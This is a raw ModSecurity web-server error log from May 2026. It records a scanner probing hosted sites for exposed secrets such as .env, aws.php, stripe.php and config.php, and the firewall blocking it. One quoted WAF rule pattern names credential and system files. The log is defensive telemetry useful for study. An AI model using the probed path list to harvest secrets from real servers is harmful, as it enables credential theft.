[Tue May 26 14:01:53.430325 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoUQAAH0I"]
[Tue May 26 14:01:53.432378 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoWQAAH0w"]
[Tue May 26 14:01:53.433831 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoUwAAHzs"]
[Tue May 26 14:01:53.438778 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoSgAAHyE"]
[Tue May 26 14:01:53.439190 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoUAAAHy0"]
[Tue May 26 14:01:53.443631 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoXQAAHy4"]
[Tue May 26 14:01:53.443928 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoTwAAHzI"]
[Tue May 26 14:01:53.451908 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoTgAAHyY"]
[Tue May 26 14:01:53.459820 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeJm_8al1sb-umPtoTQAAHzE"]
[Tue May 26 14:01:53.552076 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtocwAAHyk"]
[Tue May 26 14:01:53.558287 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtodQAAHxo"]
[Tue May 26 14:01:53.563923 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtodgAAHzk"]
[Tue May 26 14:01:53.565658 2026] [security2:error] [pid 578581:tid 578638] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/client/.env"] [unique_id "ahVaeZm_8al1sb-umPtoegAAHzg"]
[Tue May 26 14:01:53.579096 2026] [security2:error] [pid 578581:tid 578664] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/cms/.env"] [unique_id "ahVaeZm_8al1sb-umPtofAAAH1I"]
[Tue May 26 14:01:53.604340 2026] [security2:error] [pid 578581:tid 578647] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/config.php"] [unique_id "ahVaeZm_8al1sb-umPtogwAAH0E"]
[Tue May 26 14:01:53.642187 2026] [security2:error] [pid 578581:tid 578810] [client 4.193.189.92:3132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/fff.php"] [unique_id "ahVaeZm_8al1sb-umPtohgAAAGM"]
[Tue May 26 14:01:53.737388 2026] [security2:error] [pid 578581:tid 578818] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtobgAAAGs"]
[Tue May 26 14:01:53.749850 2026] [security2:error] [pid 578581:tid 578655] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/config/.env"] [unique_id "ahVaeZm_8al1sb-umPtokwAAH0k"]
[Tue May 26 14:01:54.351051 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtodwAAHzc"]
[Tue May 26 14:01:54.356455 2026] [security2:error] [pid 578581:tid 578754] [client 4.193.189.92:6669] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/ff1.php"] [unique_id "ahVaepm_8al1sb-umPtopAAAACs"]
[Tue May 26 14:01:54.385708 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtoeQAAH0Y"]
[Tue May 26 14:01:54.388332 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtoeAAAH0o"]
[Tue May 26 14:01:54.396881 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtoewAAHyU"]
[Tue May 26 14:01:54.399017 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtofQAAH0Q"]
[Tue May 26 14:01:54.403011 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtoiQAAH1Q"]
[Tue May 26 14:01:54.403738 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtoggAAH1s"]
[Tue May 26 14:01:54.410839 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtofgAAHzw"]
[Tue May 26 14:01:54.424162 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtojQAAH2s"]
[Tue May 26 14:01:54.427296 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtofwAAH04"]
[Tue May 26 14:01:54.429785 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtogAAAHys"]
[Tue May 26 14:01:54.439658 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtojAAAHz4"]
[Tue May 26 14:01:54.452778 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtogQAAHz8"]
[Tue May 26 14:01:54.465404 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtolAAAH2E"]
[Tue May 26 14:01:54.465992 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtokQAAH00"]
[Tue May 26 14:01:54.471890 2026] [security2:error] [pid 578581:tid 578742] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaeZm_8al1sb-umPtoiAAAH1U"]
[Tue May 26 14:01:54.541953 2026] [security2:error] [pid 578581:tid 578663] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/config/aws.php"] [unique_id "ahVaepm_8al1sb-umPtoqwAASlE"]
[Tue May 26 14:01:54.548345 2026] [security2:error] [pid 578581:tid 578670] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/config/config.inc.php"] [unique_id "ahVaepm_8al1sb-umPtorgAASlg"]
[Tue May 26 14:01:54.571834 2026] [security2:error] [pid 578581:tid 578684] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/config/config.php"] [unique_id "ahVaepm_8al1sb-umPtosQAASmY"]
[Tue May 26 14:01:54.640534 2026] [security2:error] [pid 578581:tid 578690] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/config/env.php"] [unique_id "ahVaepm_8al1sb-umPtouQAASmw"]
[Tue May 26 14:01:54.693547 2026] [security2:error] [pid 578581:tid 578687] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/config/module.config.php"] [unique_id "ahVaepm_8al1sb-umPtovAAASmk"]
[Tue May 26 14:01:54.722775 2026] [security2:error] [pid 578581:tid 578686] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/config/nexmo.php"] [unique_id "ahVaepm_8al1sb-umPtowgAASmg"]
[Tue May 26 14:01:54.918577 2026] [security2:error] [pid 578581:tid 578795] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtoqAAAAFQ"]
[Tue May 26 14:01:55.112867 2026] [security2:error] [pid 578581:tid 578775] [client 4.193.189.92:6292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/flower.php"] [unique_id "ahVae5m_8al1sb-umPto0gAAAEA"]
[Tue May 26 14:01:55.344212 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtopwAASk8"]
[Tue May 26 14:01:55.376993 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtoqQAASkA"]
[Tue May 26 14:01:55.394902 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtorwAASlY"]
[Tue May 26 14:01:55.398017 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtougAASlM"]
[Tue May 26 14:01:55.398260 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtoqgAASlw"]
[Tue May 26 14:01:55.407686 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtorQAASlA"]
[Tue May 26 14:01:55.415246 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtoxgAASm4"]
[Tue May 26 14:01:55.424815 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtorAAASks"]
[Tue May 26 14:01:55.430824 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtosAAASlk"]
[Tue May 26 14:01:55.431343 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtoxAAASgU"]
[Tue May 26 14:01:55.431513 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtouAAASm0"]
[Tue May 26 14:01:55.432569 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtoxQAASmo"]
[Tue May 26 14:01:55.433252 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtotAAASlo"]
[Tue May 26 14:01:55.438646 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtoswAASl0"]
[Tue May 26 14:01:55.445252 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtouwAASl8"]
[Tue May 26 14:01:55.445977 2026] [security2:error] [pid 578581:tid 578785] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaepm_8al1sb-umPtosgAASlc"]
[Tue May 26 14:01:55.521702 2026] [security2:error] [pid 578581:tid 578593] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/config/stripe.php"] [unique_id "ahVae5m_8al1sb-umPto4wAAWws"]
[Tue May 26 14:01:55.815143 2026] [security2:error] [pid 578581:tid 578776] [client 14.179.139.104:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto3gAAAEE"]
[Tue May 26 14:01:55.849783 2026] [security2:error] [pid 578581:tid 578834] [client 4.193.189.92:6781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/file.php"] [unique_id "ahVae5m_8al1sb-umPto-QAAAHs"]
[Tue May 26 14:01:56.313980 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto4gAAW2U"]
[Tue May 26 14:01:56.374746 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto5gAAWwQ"]
[Tue May 26 14:01:56.379754 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto5AAAWwc"]
[Tue May 26 14:01:56.382400 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto5wAAWwI"]
[Tue May 26 14:01:56.400827 2026] [security2:error] [pid 578581:tid 578802] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVae5m_8al1sb-umPto7wAAW2A"]
